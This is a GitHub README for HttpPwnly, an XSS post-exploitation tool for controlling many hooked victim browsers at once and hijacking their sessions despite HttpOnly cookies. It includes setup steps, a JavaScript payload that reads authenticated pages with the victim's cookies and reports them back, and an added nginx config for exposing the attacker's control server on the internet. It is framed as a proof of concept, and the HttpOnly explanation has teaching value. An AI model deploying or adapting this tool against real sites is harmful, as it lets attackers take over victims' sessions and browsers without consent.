Open-source project: Danladi/HttpPwnly
Repository: https://github.com/Danladi/HttpPwnly
Language: HTML 61.4%

HttpPwnly

"Repeater" style XSS post-exploitation tool for mass browser control. Primarily a PoC to show why the HttpOnly flag isn't a complete protection against session hijacking via XSS: HttpOnly stops injected script from reading the session cookie through document.cookie, but the hooked browser still attaches that cookie to every same-origin request the script makes, so an attacker can drive the victim's session without ever learning the cookie value.

Dependencies:

pip install -r requirements.txt

Usage:

To run the tool, simply use:
For production usage, run and configure a reverse proxy that serves both HTTP on port 80 and HTTPS on port 443 with a properly signed TLS certificate. This is free and fairly straightforward with Let's Encrypt, provided you own a domain. See "Reverse proxy" below for further info and a copy-paste nginx config. When you run httppwnly, a randomly generated password for the user "admin" is displayed in the terminal. At this point, visit https://[yourdomain]/login in your browser (log in over HTTPS rather than plain HTTP, so the admin password is not sent in the clear). After logging in, you will have access to /dashboard. To hook a victim, write the following script tag into a page via XSS:
Demo:

Asynchronous payloads:

To override the normal task output from within your payload (for example, to report the response of an XMLHttpRequest that completes only after the payload itself has returned), call the "sendOutput" function and pass it your intended output. For example:

```javascript
// id and sendOutput are provided by the HttpPwnly hook in the payload's scope:
// id identifies the task whose output is being overridden.
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function() {
  // readyState 4: the response has arrived, so report it as this task's output.
  if (xmlhttp.readyState == 4) {
    sendOutput(id, xmlhttp.responseText);
  }
};
// Same-origin request: the victim's browser attaches its cookies automatically,
// HttpOnly or not, so the response is the authenticated page.
xmlhttp.open("GET", "/", true);
xmlhttp.send();
```

Reverse proxy:

HttpPwnly binds to localhost:5000. To make the framework reachable remotely, the best approach is a reverse proxy. It is also recommended to offer HTTP as well as HTTPS, another reason to use a reverse proxy. I personally recommend nginx for this. This is a working nginx config file:
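The nginx config referred to above did not survive on this page. The following is an added example written for this edit, not the project's own file: it does what the paragraph describes (plain HTTP on port 80, HTTPS on port 443 with a Let's Encrypt certificate, everything proxied to the HttpPwnly process on localhost:5000). The domain pwn.example.com and the certificate paths under /etc/letsencrypt are assumptions; substitute your own.

```nginx
# Added example, not HttpPwnly's own config.
# Assumed domain: pwn.example.com
# Assumed certificate paths: the defaults certbot writes under /etc/letsencrypt

upstream httppwnly {
    # HttpPwnly listens only on the loopback interface
    server 127.0.0.1:5000;
}

server {
    # Serve both schemes from one block, without redirecting 80 to 443,
    # so the hook script can be loaded over either HTTP or HTTPS.
    listen 80;
    listen 443 ssl;
    server_name pwn.example.com;

    ssl_certificate     /etc/letsencrypt/live/pwn.example.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/pwn.example.com/privkey.pem;
    ssl_protocols       TLSv1.2 TLSv1.3;

    location / {
        proxy_pass http://httppwnly;
        # Pass the public hostname and original scheme/client address through
        # so the application can build correct URLs and log the real client.
        proxy_set_header Host              $host;
        proxy_set_header X-Real-IP         $remote_addr;
        proxy_set_header X-Forwarded-For   $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
    }
}
```

Because port 80 is proxied as well, the login page and dashboard are reachable over plain HTTP too; only the hook needs that, so do your own logins at https://[yourdomain]/login, and keep port 5000 bound to localhost so the only way in is through this proxy.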
2023-10-27